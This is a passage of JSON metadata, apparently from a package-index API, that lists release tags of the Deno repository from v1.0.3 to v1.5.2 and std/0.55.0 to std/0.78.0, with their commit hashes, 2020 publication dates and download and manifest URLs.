8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0/manifests"},{"name":"v1.5.2","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2/manifests"},{"name":"std/0.77.0","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.77.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.77.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0/manifests"},{"name":"v1.5.1","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1/manifests"},{"name":"std/0.76.0","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.76.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.76.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0/manifests"},{"name":"v1.5.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0/manifests"},{"name":"std/0.75.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.75.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.75.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0/manifests"},{"name":"v1.4.6","sha":"9e9ec9784a639ef7205e1e303301ee558439b045","kind":"commit","published_at":"2020-10-10T10:30:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6/manifests"},{"name":"v1.4.5","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5/manifests"},{"name":"std/0.74.0","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.74.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.74.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.74.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0/manifests"},{"name":"v1.4.4","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4/manifests"},{"name":"std/0.73.0","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.73.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.73.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.73.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0/manifests"},{"name":"v1.4.3","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3/manifests"},{"name":"std/0.72.0","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.72.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.72.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.72.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0/manifests"},{"name":"v1.4.2","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2/manifests"},{"name":"std/0.71.0","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.71.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.71.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.71.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0/manifests"},{"name":"v1.4.1","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:40:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1/manifests"},{"name":"std/0.70.0","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:38:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.70.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.70.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.70.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0/manifests"},{"name":"v1.4.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0/manifests"},{"name":"std/0.69.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.69.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.69.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.69.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0/manifests"},{"name":"v1.3.3","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3/manifests"},{"name":"std/0.68.0","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.68.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.68.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.68.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0/manifests"},{"name":"v1.3.2","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2/manifests"},{"name":"std/0.67.0","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.67.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0/manifests"},{"name":"v1.3.1","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1/manifests"},{"name":"std/0.66.0","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.66.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0/manifests"},{"name":"v1.3.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0/manifests"},{"name":"std/0.65.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.65.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0/manifests"},{"name":"v1.2.3","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3/manifests"},{"name":"std/0.64.0","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.64.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0/manifests"},{"name":"v1.2.2","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2/manifests"},{"name":"std/0.63.0","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.63.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0/manifests"},{"name":"v1.2.1","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1/manifests"},{"name":"std/0.62.0","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.62.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0/manifests"},{"name":"v1.2.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0/manifests"},{"name":"std/0.61.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.61.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0/manifests"},{"name":"v1.1.3","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3/manifests"},{"name":"std/0.60.0","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.60.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0/manifests"},{"name":"v1.1.2","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2/manifests"},{"name":"std/0.59.0","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.59.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0/manifests"},{"name":"v1.1.1","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1/manifests"},{"name":"std/0.58.0","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.58.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0/manifests"},{"name":"v1.1.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0/manifests"},{"name":"std/0.57.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.57.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0/manifests"},{"name":"v1.0.5","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5/manifests"},{"name":"std/0.56.0","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.56.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0/manifests"},{"name":"v1.0.4","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4/manifests"},{"name":"std/0.55.0","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.55.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0/manifests"},{"name":"v1.0.3","sha":"106b00173806e088472e123d04fdc8d260c3820